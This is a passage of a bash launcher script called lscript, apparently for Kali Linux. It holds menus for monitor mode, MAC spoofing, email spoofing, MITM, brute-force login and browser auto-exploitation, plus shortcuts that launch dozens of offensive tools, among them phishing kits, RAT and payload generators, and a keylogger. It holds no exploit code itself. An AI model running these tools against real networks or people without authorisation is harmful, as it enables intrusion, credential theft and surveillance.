· 4 years ago · Jan 16, 2021, 03:48 PM
1#! /bin/bash
2
3# set -x
4VERSION=2.1.5
5#Number of tools with keyboard shortcut support
6HOWMANYTOOLS=53
7BACKL="0"
8DONATIONS=13
9LATESTCHANGELOGLINES=26
10cd
11#############DEFAULTS###############
12function defaults_l
13{
14#path for lscript
15 LPATH="/root/lscript"
16 export LPATH
17#path for keyboard shortcuts
18 KSPATH=""$LPATH"/ks"
19 export KSPATH
20#making sure the kspath is set
21 if [[ ! -d "$KSPATH" ]]
22 then
23 mkdir "$KSPATH"
24 fi
25#wififb file
26 wififbfile=""$LPATH"/wififb.txt"
27 wififbfileall=""$LPATH"/wififball.txt"
28 wififbpassfile=""$LPATH"/wififbpasswords.txt"
29 wififbpassfileall=""$LPATH"/wififbpasswordsall.txt"
30 export wififbfile
31 export wififbfileall
32 export wififbpassfile
33 export wififbpassfileall
34#ALFA SUPPORT SETTING
35 if [[ -f "$LPATH"/settings/AWUS036ACH.txt ]]
36 then
37 read ALFA < "$LPATH"/settings/AWUS036ACH.txt
38 else
39 ALFA="no"
40 fi
41#yellow start
42 YS="\e[1;33m"
43#blue start
44 BS="\e[0;34m"
45#color end
46 CE="\e[0m"
47#red start
48 RS="\e[1;31m"
49#black start
50 BLS="\e[0;30m"
51#dark gray start
52 DGYS="\e[1;30m"
53#light blue start
54 LBS="\e[1;34m"
55#green start
56 GNS="\e[0;32m"
57#light green start
58 LGNS="\e[1;32m"
59#cyan start
60 CYS="\e[0;36m"
61#light cyan start
62 LCYS="\e[1;36m"
63#light red start
64 DRS="\e[0;31m"
65#purple start
66 PS="\e[0;35m"
67#light purple start
68 LPS="\e[1;35m"
69#brown start
70 BRS="\e[0;33m"
71#light gray start
72 LGYS="\e[0;37m"
73#white start
74 WHS="\e[1;37m"
75#setting custom color for logo
76 if [[ -f "$LPATH"/settings/logocolor.txt ]]
77 then
78 read COL < "$LPATH"/settings/logocolor.txt
79 else
80 COL="$RS"
81 fi
82#tools
83toolarray=(
84"fluxion" "sniffer" "wifite" "wifiphisher" "morpheus" "osrframework" "hakku" "trity" "cupp" "dracnmap" "fern" "kickthemout" "ghostphisher" "theeye" "xerxes"
85"mdk3" "katana" "airgeddon" "4nonimizer" "beelogger" "ezsploit" "pupy" "zirikatu" "wifiautopwner" "bully" "anonsurf" "anonym8" "thefatrat" "angryip" "sniper"
86"recondog" "redhawk" "winpayloads" "chaos" "routersploit" "infoga" "nwatch" "eternalscanner" "eaphammer" "dagon" "lalin" "knockmail" "kwetza" "ngrok" "netdiscover"
87"websploit" "openvas" "shellter" "geany" "bleachbit" "vmr" "hashbuster" "findsploit" "howdoi" "operative" "netattack2" "koadic" "empire" "meterpreter_paranoid_mode"
88"dropit_frmw" "wifi_pumpkin" "veil" "leviathan" "fake_image" "avet" "gloom" "arcanus" "msfpc" "morphhta" "lfi" "unibyav" "demiguise" "dkmc" "sechub" "beef" "mitmf"
89"fsociety" "arp_scan" "netool" "sqlmap" "patator" "zeus" "evil_droid" "nosqlmap" "eggshell" "zerodoor" "cromos" "yuki-chan" "socialfish" "autosploit" "blazy"
90"striker" "hyprpulse" "instaburst" "instagram-py" "datasploit" "sitebroker" "enigma"
91)
92#setting frequent stings
93 YNYES="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=yes)"
94 YNNO="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=no)"
95 YNONLY="("$YS"y"$CE"/"$YS"n"$CE")"
96 PAKT="Press "$YS"any key$CE to"
97 PAKTC="Press "$YS"any key$CE to continue..."
98 PAKTGB="Press "$YS"any key$CE to go back..."
99 TNI=""$RS"Tool is not installed. To install it type '"$CE""$YS"install"$CE""$RS"'."$CE""
100#code to read from keyboard without return
101 READAK="read -n 1"
102#default MAC when starting monitor
103 DEFMAC="00:11:22:33:44:55"
104
105 wififb="wififb"
106}
107##############FUNCTIONS#############
108function local_ips()
109{
110 iffile=""$LPATH"/iftemp.txt"
111 #passing an interface if any
112 LF="$1"
113 GREPP=$(ifconfig)
114 if [[ "$LF" = "" ]]
115 then
116 echo -e ""$BS"Local IPs"$CE": "
117 TEST=$(echo "$GREPP" | grep "$ETH:")
118 n=0
119 if [[ $TEST != "" ]]
120 then
121 ifconfig "$ETH" > $iffile
122 LOCALETH=$(cat $iffile | grep " inet " | awk -F "inet " {'print $2'} | cut -d ' ' -f1)
123 cho=$(is_it_an_ip $LOCALETH)
124 if [[ "$cho" = 1 ]]
125 then
126 echo -e ""$ETH" = "$YS"$LOCALETH"$CE""
127 n=1
128 fi
129 fi
130 TEST=$(echo "$GREPP" | grep "$WLANN:")
131 if [[ $TEST != "" ]]
132 then
133 ifconfig $WLANN > $iffile
134 LOCALMA=$(cat $iffile | grep " inet " | awk -F "inet " {'print $2'} | cut -d ' ' -f1)
135 cho=$(is_it_an_ip $LOCALMA)
136 if [[ "$cho" = 1 ]]
137 then
138 echo -e "$WLANN = "$YS"$LOCALMA"$CE""
139 n=1
140 fi
141 fi
142 TEST=$(echo "$GREPP" | grep "$WLANNM:")
143 if [[ $TEST != "" ]]
144 then
145 ifconfig $WLANNM > $iffile
146 LOCALMO=$(cat $iffile | grep " inet " | awk -F "inet " {'print $2'} | cut -d ' ' -f1)
147 cho=$(is_it_an_ip $LOCALMO)
148 if [[ "$cho" = 1 ]]
149 then
150 echo -e "$WLANNM = "$YS"$LOCALMO"$CE""
151 n=1
152 fi
153 fi
154 if [[ "$n" = 0 ]]
155 then
156 echo -e ""$RS"No known interfaces found available"$CE""
157 fi
158 echo -e ""
159 find_gateways
160 else
161 TEST=$(echo "$GREPP" | grep "$LF:")
162 if [[ $TEST != "" ]]
163 then
164 ifconfig $LF > $iffile
165 LOCALM=$(cat $iffile | grep " inet " | awk -F "inet " {'print $2'} | cut -d ' ' -f1)
166 cho=$(is_it_an_ip $LOCALM)
167 if [[ "$cho" = 1 ]]
168 then
169 OUTPUT="$LOCALM"
170 echo -e "$OUTPUT"
171 fi
172 fi
173 fi
174}
175function give_ip_take_zero()
176{
177 #passing an ip
178 GI1="$1"
179 GI2="$2"
180 if [[ "$GI1" = "" ]]
181 then
182 echo -e ""$RS"Error 7. No parameters passed"$CE""
183 sleep 3
184 else
185 ip1=$(echo -e "$GI1" | cut -d '.' -f1)
186 ip2=$(echo -e "$GI1" | cut -d '.' -f2)
187 ip3=$(echo -e "$GI1" | cut -d '.' -f3)
188 if [[ "$GI2" = "" ]]
189 then
190 OUTPUT=""$ip1"."$ip2"."$ip3".0"
191 else
192 OUTPUT=""$ip1"."$ip2"."$ip3"."
193 fi
194 echo "$OUTPUT"
195 fi
196}
197function is_it_an_ip()
198{
199 IIA=$1
200 IIAI=${#IIA}
201 if [[ "$IIA" = "" ]]
202 then
203 echo -e ""$RS"Error 9. No parameteres passed"
204 sleep 2
205 else
206 if [[ "$IIAI" -le 15 && "$IIAI" -ge 7 ]]
207 then
208 echo 1
209 else
210 echo 0
211 fi
212 fi
213}
214function latest_changelog
215{
216 clear
217 printf '\033]2;LATEST CHANGELOG\a'
218 echo -e ""$BS"Wellcome to version $VERSION"$CE""
219 echo -e "What is included in this update: "
220 cat "$LPATH"/Changelog | head -n $LATESTCHANGELOGLINES
221 echo -e "$PAKTC"
222 $READAK
223}
224function finish
225{
226 echo -e ""$RS"Hard kill detected.."$CE""
227}
228function dash_calc
229{
230
231 size=${#TERMINALTITLE}
232 calc=$(( 65-size ))
233 calc=$(( calc/2 ))
234 numcalc=1
235 DASHESN="-"
236 while [ $numcalc != $calc ]
237 do
238 DASHESN=""$DASHESN"-"
239 numcalc=$(( numcalc+1 ))
240 done
241 echo -e "$DASHESN"$RS"$TERMINALTITLE"$CE"$DASHESN"
242}
243function managed_spaces
244{
245 size=${#WLANN}
246 calc=$(( 11-size ))
247 numcalc=1
248 SPACESN=" "
249 while [ $numcalc != $calc ]
250 do
251 SPACESN=""${SPACESN}" "
252 numcalc=$(( numcalc+1 ))
253 done
254}
255function monitor_spaces
256{
257 size=${#WLANNM}
258 calc=$(( 11-size ))
259 numcalc=1
260 SPACESM=" "
261 while [ $numcalc != $calc ]
262 do
263 SPACESM=""${SPACESM}" "
264 numcalc=$(( numcalc+1 ))
265 done
266}
267function check_wlans
268{
269 CC=$WLANN
270 WLANCHECKING=$(ifconfig | grep "$WLANN" )
271 #~ WLANCHECKING=$(ifconfig | awk -v c1="$CC" '$0 ~ c1 {print}')
272 CC=$WLANNM
273 WLANMCHECKING=$(ifconfig | grep "$WLANNM" )
274 #~ WLANMCHECKING=$(ifconfig | awk -v c1="$CC" '$0 ~ c1 {print}')
275}
276function banner
277{
278 check_wlans
279 echo -e ""
280 echo -e "$COL ██╗ █████╗ ███████╗██╗ ██╗$CE v$VERSION"
281 echo -e "$COL ██║ ██╔══██╗╚══███╔╝╚██╗ ██╔╝$CE"
282 echo -e "$COL ██║ ███████║ ███╔╝ ╚████╔╝ $CE by "$COL"ARIS MELACHROINOS$CE"
283 echo -e "$COL ██║ ██╔══██║ ███╔╝ ╚██╔╝ $CE"
284 echo -e "$COL The ███████╗██║ ██║███████╗ ██║ script$CE"
285 echo -e "$COL ╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ $CE"
286 echo -e ""$YS"if"$CE") Ifconfig "$YS"l"$CE") Local IPs & gateways "$RS"|"$CE" "$YS"scan"$CE") Arp-scan network"
287 if [[ "$WLANCHECKING" = "" ]]
288 then
289 echo -e ""$RS" 1"$CE") Enable "$RS"$WLANN"$CE"${SPACESN}"$RS"d1"$CE") Disable "$RS"$WLANN"$CE"${SPACESN} "$RS"|"$CE" "$YS"start"$CE") Start monitor mode"
290 echo -e ""$RS" 2"$CE") Enable "$RS"$WLANNM"$CE"${SPACESM}"$RS"d2"$CE") Disable "$RS"$WLANNM"$CE"${SPACESM} "$RS"|"$CE" "$YS"stop"$CE") Stop monitor mode"
291 else
292 echo -e ""$YS" 1"$CE") Enable $WLANN${SPACESN}"$YS"d1"$CE") Disable $WLANN${SPACESN} "$RS"|"$CE" "$YS"start"$CE") Start monitor mode"
293 echo -e ""$YS" 2"$CE") Enable $WLANNM${SPACESM}"$YS"d2"$CE") Disable $WLANNM${SPACESM} "$RS"|"$CE" "$YS"stop"$CE") Stop monitor mode"
294 fi
295 echo -e ""$YS" 3"$CE") Change MAC "$YS"d3"$CE") Restore original MAC "$RS"|"$CE""$YS"update"$CE") Check for updates"
296 if [[ -f /usr/bin/anonym8 ]]
297 then
298 echo -e ""$YS" 4"$CE") Enable anonym8 "$YS"d4"$CE") Disable anonym8 "$RS"|"$CE""$YS"errors"$CE") Fix some errors"
299 else
300 echo -e ""$RS" 4"$CE") Enable anonym8 "$RS"d4"$CE") Disable anonym8 "$RS"|"$CE""$YS"errors"$CE") Fix some errors"
301 fi
302 if [[ -f /usr/bin/anonsurf ]]
303 then
304 echo -e ""$YS" 5"$CE") Enable anonsurf "$YS"d5"$CE") Disable anonsurf "$RS"|"$CE" "$YS"ks"$CE") Keyboard shortucts"
305 echo -e ""$YS" 6"$CE") Anonsurf's status "$YS"d6"$CE") Restart anonsurf "$RS"|"$CE""$YS" d"$CE") Buy me a coffee"
306 else
307 echo -e ""$RS" 5"$CE") Enable anonsurf "$RS"d5"$CE") Disable anonsurf "$RS"|"$CE" "$YS"ks"$CE") Keyboard shortucts"
308 echo -e ""$RS" 6"$CE") Anonsurf's status "$RS"d6"$CE") Restart anonsurf "$RS"|"$CE" "$YS"d"$CE") Buy me a coffee"
309 fi
310 echo -e ""$YS" 7"$CE") View public IP "$RS"|"$CE" "$YS"s"$CE") Go to settings menu"
311 echo -e ""$YS" 8"$CE") View MAC"
312 echo -e ""$YS" 9"$CE") TOOLS "$YS"15"$CE") Spoof EMAIL "$YS"22"$CE") Show bandwidth"
313 if [[ -f /root/ngrok ]]
314 then
315 echo -e ""$YS"10"$CE") Handshake "$YS"16"$CE") Ngrok port forward"
316 else
317 echo -e ""$YS"10"$CE") Handshake "$RS"16"$CE") "$RS"Ngrok"$CE" port forward"
318 fi
319 if [[ -f /usr/local/bin/howdoi ]]
320 then
321 echo -e ""$YS"11"$CE") Find WPS pin "$YS"17"$CE") Ask (Howdoi tool)"
322 else
323 echo -e ""$YS"11"$CE") Find WPS pin "$RS"17"$CE") Ask ("$RS"Howdoi"$CE" tool)"
324 fi
325 echo -e ""$YS"12"$CE") WEP menu "$YS"18"$CE") Auto-exploit browser"
326 echo -e ""$YS"13"$CE") MITM "$YS"19"$CE") Geolocate an IP"
327 echo -e ""$YS"14"$CE") Metasploit "$YS"20"$CE") Bruteforce login"
328 echo -e ""$YS" 0"$CE") Exit "$YS"21"$CE") Sqlmap automated"
329 echo "Choose: "
330 read -e YORNAA
331 #~ echo "$YORNNA"
332 #~ history -s "$YORNNA"
333 clear
334}
335function enable_wlan
336{
337 O4=0
338 echo -e "Enabling $WLANN..."
339 rfkill unblock wifi &> /dev/null; rfkill unblock all &> /dev/null
340 ifconfig $WLANN up &>/dev/null && echo -e ""$YS"Done"$CE"" && O4=1 || echo -e ""$RS"Error. I can't find your wireless adapter"$CE""
341}
342function disable_wlan
343{
344 echo -e "Disabling $WLANN..."
345 rfkill unblock wifi &> /dev/null; rfkill unblock all &> /dev/null
346 ifconfig $WLANN down &>/dev/null && echo -e ""$YS"Done"$CE"" && O4=1 || echo -e ""$RS"Error. I can't find your wireless adapter."$CE""
347}
348function interface_selection
349{
350if [[ "$WLANCHECKING" = "" ]]
351then
352 echo -e ""$RS" 1"$CE") $WLANN"
353else
354 echo -e ""$YS" 1"$CE") $WLANN"
355fi
356if [[ "$WLANMCHECKING" = "" ]]
357then
358 echo -e ""$RS" 2"$CE") $WLANNM"
359else
360 echo -e ""$YS" 2"$CE") $WLANNM"
361fi
362echo -e ""$YS" 3"$CE") "$ETH""
363echo -e ""$YS" b"$CE") Main menu"
364echo -e ""$YS" 0"$CE") EXIT"
365echo -e "Choose: "
366read -e MYINT
367if [[ "$MYINT" = "2" ]]
368then
369 if [[ "$WLANMCHECKING" = "" ]]
370 then
371 MYINT="OFF"
372 else
373 MYINT="$WLANNM"
374 fi
375elif [[ "$MYINT" = "1" ]]
376then
377 if [[ "$WLANCHECKING" = "" ]]
378 then
379 MYINT="OFF"
380 else
381 MYINT="$WLANN"
382 fi
383elif [[ "$MYINT" = "0" ]]
384then
385 clear
386 exit
387elif [[ "$MYINT" = "00" || "$MYINT" = "b" ]]
388then
389 exec bash "$0"
390elif [[ "$MYINT" = "3" ]]
391then
392 MYINT="$ETH"
393else
394echo -e "Wrong choice..."
395sleep 2
396clear
397echo -e "EXITING"
398sleep 1
399exec bash "$0"
400fi
401export MYINT
402}
403function change_mac
404{
405 interface_selection
406 clear
407 if [[ "$MYINT" = "OFF" ]]
408 then
409 echo -e "Interface not available"
410 sleep 2
411 else
412 echo -e "Change it to a random or specific?("$YS"r"$CE"/"$YS"s"$CE")("$YS"Enter"$CE"=r): "
413 read -e RORS
414 clear
415 if [[ "$RORS" != "s" ]]
416 then
417 echo -e "Changing mac address of $MYINT to a random one..."
418 ifconfig $MYINT down
419 macchanger -r $MYINT
420 ifconfig $MYINT up
421 echo -e "Done."
422 else
423 echo -e "Enter the MAC you want:"
424 read -e SMAC
425 echo -e "Changing mac address of $MYINT to $SMAC..."
426 ifconfig $MYINT down
427 macchanger -m $SMAC $MYINT
428 ifconfig $MYINT up
429 echo -e "Done."
430 fi
431 fi
432}
433function set_interface_number
434{
435clear
436while true
437do
438echo -e "Enter the name of your wireless interface when in "$RS"managed"$CE" mode("$YS"Enter"$CE"=wlan0): "
439read MANAGED
440if [[ "$MANAGED" = "" ]]
441then
442 MANAGED="wlan0"
443fi
444echo -e "Enter the name of your wireless interface when in "$RS"monitor"$CE" mode("$YS"Enter"$CE"=wlan0mon): "
445read MONITOR
446if [[ "$MONITOR" = "" ]]
447then
448 MONITOR="wlan0mon"
449fi
450echo -e "Enter the name of your wired interface("$YS"Enter"$CE"="eth0"): "
451read WIRED
452if [[ "$WIRED" = "" ]]
453then
454 WIRED="eth0"
455fi
456 echo "$MANAGED" > "$LPATH"/wlan.txt
457 echo "$MONITOR" > "$LPATH"/wlanmon.txt
458 echo "$WIRED" > "$LPATH"/eth.txt
459 echo -e ""$YS"Done"$CE""
460 sleep 1
461 clear
462 echo -e ""$BS"If you want to change it, type "$CE""$YS"interface"$CE""$BS" any time"$CE""
463 sleep 3
464 echo -e "$PAKTC"
465 $READAK
466 BACKL="1"
467 break
468done
469}
470function checkifalready
471{
472 GOOD="1"
473 num=1
474 while [ $num -le 20 ]
475 do
476 if [[ "$CHECKKS" = "$num" ]]
477 then
478 GOOD="0"
479 echo -e ""$RS"This shortcut is already in use by the script."$CE""
480 sleep 3
481 fi
482 num=$(( num+1 ))
483 done
484 if [[ "$GOOD" = "1" ]]
485 then
486 if [[ "$CHECKKS" = "etercheck" || "$CHECKKS" = "eternalblue" || "$CHECKKS" = "changelog" || "$CHECKKS" = "wififb" || "$CHECKKS" = "nessusstop" || "$CHECKKS" = "nessusstart" || "$CHECKKS" = "pstop" || "$CHECKKS" = "pstart" || "$CHECKKS" = "astop" || "$CHECKKS" = "astart" || "$CHECKKS" = "settings" || "$CHECKKS" = "donate" || "$CHECKKS" = "d" || "$CHECKKS" = "s" || "$CHECKKS" = "g" || "$CHECKKS" = "l" || "$CHECKKS" = "" || "$CHECKKS" = "if" || "$CHECKKS" = "ifconfig" || "$CHECKKS" = "interfaces" || "$CHECKKS" = "interface" || "$CHECKKS" = "errors" || "$CHECKKS" = "00" || "$CHECKKS" = "exit" || "$CHECKKS" = "update" || "$CHECKKS" = "d1" || "$CHECKKS" = "d2" || "$CHECKKS" = "d3" || "$CHECKKS" = "d4" || "$CHECKKS" = "d5" || "$CHECKKS" = "d6" || "$CHECKKS" = "d7" || "$CHECKKS" = "gg" || "$CHECKKS" = "ks" ]]
487 then
488 GOOD="0"
489 echo -e ""$RS"This shortcut is already in use by the script."$CE""
490 sleep 3
491 fi
492 fi
493 if [[ "$CHECKKS" = "delete" ]]
494 then
495 GOOD="0"
496 fi
497 #~ if [[ "$CHECKKS" = "b" || "$CHECKKS" = "back" ]]
498 #~ then
499 #~ GOOD="0"
500 #~ fi
501 if [[ "$GOOD" = "1" ]]
502 then
503 BACKUPTITLE="$TITLE"
504 BACKUPNN="$nn"
505 num=1
506 while [[ $num -le "$HOWMANYTOOLS" ]]
507 do
508 nn="$num"
509 listshortcuts
510 if [[ -f ""$KSPATH"/"$TITLE"/"$TITLE"ks.txt" ]]
511 then
512 read KSIFALREADY < "$KSPATH"/"$TITLE"/"$TITLE"ks.txt
513 if [[ "$CHECKKS" == "$KSIFALREADY" ]]
514 then
515 echo -e ""$RS"Shortcut '"$CHECKKS"' is already in use by "$TITLE""$CE""
516 GOOD=0
517 sleep 3
518 fi
519 fi
520 num=$(( num+1 ))
521 done
522 nn="$BACKUPNN"
523 TITLE="$BACKUPTITLE"
524 fi
525 clear
526}
527function createshortcut
528{
529if [[ ! -d ""$KSPATH"/$TITLE" ]]
530then
531 mkdir "$KSPATH"/"$TITLE"
532fi
533clear
534echo -e "Enter the keyboard shortcut that will open "$TITLE" from lscript's main menu"
535echo -e "(e.g: "$YS""$TITLE""$CE")"
536echo -e "To delete it , type: "$YS"delete"$CE""
537echo -e ""$YS" b"$CE") Go back"
538read CHECKKS
539if [[ "$CHECKKS" = "back" || "$CHECKKS" = "b" ]]
540then
541 clear
542 BACKKS=1
543 break
544else
545 BACKKS=0
546 if [[ "$BACKKS" == 0 ]]
547 then
548 CHECKKSBACKUP="$CHECKKS"
549 NAMECDBACKUP="$NAMECD"
550 KSSETBACKUP="$KSSET"
551 checkifalready
552 CHECKKS="$CHECKKSBACKUP"
553 NAMECD="$NAMECDBACKUP"
554 KSSET="$KSSETBACKUP"
555 if [[ "$GOOD" = "1" ]]
556 then
557 echo -e "Shortcut is ok.Setting it up..."
558 sleep 1
559 echo "$CHECKKS" > "$KSPATH"/"$TITLE"/"$TITLE"ks.txt
560 echo "$NAMECD" > "$KSPATH"/"$TITLE"/"$TITLE".txt
561 echo "$KSSET" > "$KSPATH"/"$TITLE"/"$TITLE"2.txt
562 echo -e "Done!"
563 echo -e "$PAKTGB"
564 $READAK
565 clear
566 #break
567 else
568 clear
569 echo -e "Removing shortcut for "$TITLE"..."
570 rm -r "$KSPATH"/"$TITLE"
571 sleep 1
572 echo -e "Done."
573 echo -e "$PAKTGB"
574 $READAK
575 clear
576 #break
577 fi
578 else
579 break
580 fi
581fi
582}
583function listshortcuts
584{
585 EXTRA1=""
586 if [[ "$nn" = "1" ]]
587 then
588 TITLE="Fluxion"
589 NAMECD="cd /root/fluxion"
590 KSSET="./fluxion*"
591 elif [[ "$nn" = "2" ]]
592 then
593 TITLE="Zirikatu"
594 NAMECD="cd /root/zirikatu"
595 KSSET="./zirikatu.sh"
596 elif [[ "$nn" = "3" ]]
597 then
598 TITLE="Wifite"
599 NAMECD=""
600 KSSET="wifite"
601 elif [[ "$nn" = "4" ]]
602 then
603 TITLE="Wifiphisher"
604 NAMECD=""
605 KSSET="wifiphisher"
606 elif [[ "$nn" = "5" ]]
607 then
608 TITLE="Zatacker"
609 NAMECD="cd /root/Zatacker"
610 KSSET="./ZT.sh"
611 elif [[ "$nn" = "6" ]]
612 then
613 TITLE="Morpheus"
614 NAMECD="cd /root/morpheus"
615 KSSET="./morpheus.sh"
616 elif [[ "$nn" = "7" ]]
617 then
618 TITLE="Hakku"
619 NAMECD="cd /root/hakkuframework"
620 KSSET="./hakku"
621 elif [[ "$nn" = "8" ]]
622 then
623 TITLE="Trity"
624 NAMECD=""
625 KSSET="trity"
626 elif [[ "$nn" = "9" ]]
627 then
628 TITLE="Cupp"
629 NAMECD="cd /root/cupp"
630 KSSET="python cupp.py -i"
631 elif [[ "$nn" = "10" ]]
632 then
633 TITLE="Dracnmap"
634 NAMECD="cd /root/Dracnmap"
635 KSSET="./dracnmap-v*.sh"
636 elif [[ "$nn" = "11" ]]
637 then
638 TITLE="Fern"
639 NAMECD=""
640 KSSET="fern-wifi-cracker"
641 elif [[ "$nn" = "12" ]]
642 then
643 TITLE="KickThemOut"
644 NAMECD="cd /root/kickthemout"
645 KSSET="python kickthemout.py"
646 elif [[ "$nn" = "13" ]]
647 then
648 TITLE="Ghost-Phisher"
649 NAMECD=""
650 KSSET="ghost-phisher"
651 elif [[ "$nn" = "14" ]]
652 then
653 TITLE="Xerxes"
654 NAMECD="cd /root/xerxes"
655 KSSET="./xerxes"
656 elif [[ "$nn" = "15" ]]
657 then
658 TITLE="Katana"
659 NAMECD=""
660 KSSET="ktf.console"
661 elif [[ "$nn" = "16" ]]
662 then
663 TITLE="Airgeddon"
664 NAMECD="cd /root/airgeddon"
665 KSSET="./airgeddon.sh"
666 elif [[ "$nn" = "17" ]]
667 then
668 TITLE="Websploit"
669 NAMECD=""
670 KSSET="websploit"
671 elif [[ "$nn" = "18" ]]
672 then
673 TITLE="BeeLogger"
674 NAMECD="cd /root/BeeLogger"
675 KSSET="python bee.py"
676 elif [[ "$nn" = "19" ]]
677 then
678 TITLE="Ezsploit"
679 NAMECD="cd /root/exsploit"
680 KSSET="./ezsploit.sh"
681 elif [[ "$nn" = "20" ]]
682 then
683 TITLE="Pupy"
684 NAMECD="cd /root/pupy/pupy"
685 KSSET="./pupysh.py"
686 elif [[ "$nn" = "21" ]]
687 then
688 TITLE="TheFatRat"
689 NAMECD="cd /root/TheFatRat"
690 KSSET="./fatrat"
691 elif [[ "$nn" = "22" ]]
692 then
693 TITLE="Angry_IP_Scanner"
694 NAMECD=" "
695 KSSET="ipscan"
696 #~ elif [[ "$nn" = "23" ]]
697 #~ then
698 #~ TITLE="Sniper"
699 #~ NAMECD='read -p 'DOMAIN:' DOMAIN'
700 #~ KSSET="sniper $DOMAIN"
701 elif [[ "$nn" = "23" ]]
702 then
703 TITLE="ReconDog"
704 NAMECD="cd /root/ReconDog"
705 KSSET="python dog.py"
706 elif [[ "$nn" = "24" ]]
707 then
708 TITLE="RED_HAWK"
709 NAMECD="cd /root/RED_HAWK"
710 KSSET="php rhawk.php"
711 elif [[ "$nn" = "25" ]]
712 then
713 TITLE="Winpayloads"
714 NAMECD="cd /root/Winpayloads"
715 KSSET="./WinPayloads.py"
716 elif [[ "$nn" = "26" ]]
717 then
718 TITLE="CHAOS"
719 NAMECD="cd /root/CHAOS"
720 KSSET="go run CHAOS.go"
721 elif [[ "$nn" = "27" ]]
722 then
723 TITLE="Routersploit"
724 NAMECD="cd /root/routersploit"
725 KSSET="./rsf.py"
726 elif [[ "$nn" = "28" ]]
727 then
728 TITLE="nWatch"
729 NAMECD="cd /root/nWatch"
730 KSSET="python nwatch.py"
731 elif [[ "$nn" = "29" ]]
732 then
733 TITLE="Eternal_scanner"
734 NAMECD="cd /root/eternal_scanner"
735 KSSET="./escan"
736 elif [[ "$nn" = "30" ]]
737 then
738 TITLE="LALIN"
739 NAMECD="cd /root/LALIN"
740 KSSET="./Lalin.sh"
741 elif [[ "$nn" = "31" ]]
742 then
743 TITLE="Shellter"
744 NAMECD=""
745 KSSET="shellter"
746 elif [[ "$nn" = "32" ]]
747 then
748 TITLE="Netattack2"
749 NAMECD="cd /root/netattack2"
750 KSSET="python2 netattack2.py"
751 elif [[ "$nn" = "33" ]]
752 then
753 TITLE="Operative-framework"
754 NAMECD="cd /root/operative-framework"
755 KSSET="python operative.py"
756 elif [[ "$nn" = "34" ]]
757 then
758 TITLE="Koadic"
759 NAMECD="cd /root/koadic"
760 KSSET="./koadic"
761 elif [[ "$nn" = "35" ]]
762 then
763 TITLE="Empire"
764 NAMECD="cd /root/Empire"
765 KSSET="./empire"
766 elif [[ "$nn" = "36" ]]
767 then
768 TITLE="Meterpreter_Paranoid_Mode"
769 NAMECD="cd /root/Meterpreter_Paranoid_Mode-SSL"
770 KSSET="./Meterpreter_Paranoid_Mode.sh"
771 elif [[ "$nn" = "37" ]]
772 then
773 TITLE="Wifi-Pumpkin"
774 NAMECD=""
775 KSSET="wifi-pumpkin"
776 elif [[ "$nn" = "38" ]]
777 then
778 TITLE="Veil"
779 NAMECD="cd /root/Veil"
780 KSSET="./Veil.py"
781 elif [[ "$nn" = "39" ]]
782 then
783 TITLE="Leviathan"
784 NAMECD="cd /root/leviathan"
785 KSSET="python leviathan.py"
786 elif [[ "$nn" = "40" ]]
787 then
788 TITLE="Gloom-Framework"
789 NAMECD="cd /root/Gloom-Framework"
790 KSSET="python gloom.py"
791 elif [[ "$nn" = "41" ]]
792 then
793 TITLE="Arcanus"
794 NAMECD="cd /root/ARCANUS"
795 KSSET="./ARCANUS"
796 elif [[ "$nn" = "42" ]]
797 then
798 TITLE="LFISuite"
799 NAMECD="cd /root/LFISuite"
800 KSSET="python lfisuite.py"
801 elif [[ "$nn" = "43" ]]
802 then
803 TITLE="DKMC"
804 NAMECD="cd /root/DKMC"
805 KSSET="python dkmc.py"
806 elif [[ "$nn" = "44" ]]
807 then
808 TITLE="SecHub"
809 NAMECD=""
810 KSSET="sechub"
811 elif [[ "$nn" = "45" ]]
812 then
813 TITLE="Beef-xss"
814 NAMECD="cd /usr/share/beef-xss"
815 KSSET="./beef"
816 elif [[ "$nn" = "46" ]]
817 then
818 TITLE="Evil-Droid"
819 NAMECD="cd /root/Evil-Droid"
820 KSSET="./evil-droid"
821 elif [[ "$nn" = "47" ]]
822 then
823 TITLE="NoSQLMap"
824 NAMECD="cd /root/NoSQLMap"
825 KSSET="python nosqlmap.py"
826 elif [[ "$nn" = "48" ]]
827 then
828 TITLE="EggShell"
829 NAMECD="cd /root/EggShell"
830 KSSET="python eggshell.py"
831 elif [[ "$nn" = "49" ]]
832 then
833 TITLE="Zerodoor"
834 NAMECD="cd /root/Zerodoor"
835 KSSET="python zerodoor.py"
836 elif [[ "$nn" = "50" ]]
837 then
838 TITLE="AutoSploit"
839 NAMECD="cd /root/AutoSploit"
840 KSSET="python autosploit.py"
841 elif [[ "$nn" = "51" ]]
842 then
843 TITLE="Enigma"
844 NAMECD="cd /root/Enigma"
845 KSSET="python enigma.py"
846 elif [[ "$nn" = "52" ]]
847 then
848 TITLE="SocialFish"
849 NAMECD="cd /root/SocialFish"
850 KSSET="python SocialFish.py"
851 elif [[ "$nn" = "53" ]]
852 then
853 TITLE="Yuki-Chan-The-Auto-Pentest"
854 NAMECD="cd /root/Yuki-Chan-The-Auto-Pentest"
855 KSSET="./yuki.sh"
856 fi
857}
858function reinstall_tools
859{
860while true
861do
862 clear
863 #counting the tools
864 TOOLSNUM=${#toolarray[@]}
865 HALFTOOLS=$((TOOLSNUM/2+1))
866 #number for 2ond column
867 CLMN2=$((HALFTOOLS+1))
868 CLMN2TOOLS=$((TOOLSNUM/2+1))
869 #alphabetically sort tools
870 readarray -t toolarraysorted < <(for a in "${toolarray[@]}"; do echo "$a"; done | sort)
871 echo -e ""$BS"Select out of $TOOLSNUM tools to install/update:"$CE""
872 #set colour of selected
873 SEL="$YS"
874 n=0
875 while [[ "$n" -lt "$HALFTOOLS" ]]
876 do
877 #start echoing from number 1 instead of number 0(fist array)
878 k=$((n+1))
879 #fixing the spaces to sort output better
880 if [[ "$k" -le 9 ]]
881 then
882 m=" "$k""
883 elif [[ "$k" -ge 10 && "$k" -le 99 ]]
884 then
885 m=" "$k""
886 else
887 m="$k"
888 fi
889 #calculating how many spaces needed for correct output
890 size=${#toolarraysorted["$n"]}
891 calc=$(( 35-size ))
892 numcalc=1
893 SPACES=""
894 while [[ "$numcalc" != "$calc" ]]
895 do
896 SPACES=""${SPACES}" "
897 numcalc=$(( numcalc+1 ))
898 done
899 COL1=""
900 COL2=""
901 if [[ "${selected["$n"]}" == 1 ]]
902 then
903 COL1="$SEL"
